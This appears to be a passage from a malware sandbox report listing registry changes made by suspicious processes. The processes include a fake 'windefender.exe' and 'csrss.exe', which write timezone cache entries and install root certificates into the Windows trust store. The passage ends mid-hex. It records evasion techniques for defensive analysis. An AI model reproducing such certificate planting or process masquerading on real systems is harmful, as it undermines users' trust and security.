Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-492 = "India Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-421 = "Russian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-581 = "North Asia East Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0267ce68c02da01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\1A9D.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\1A9D.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8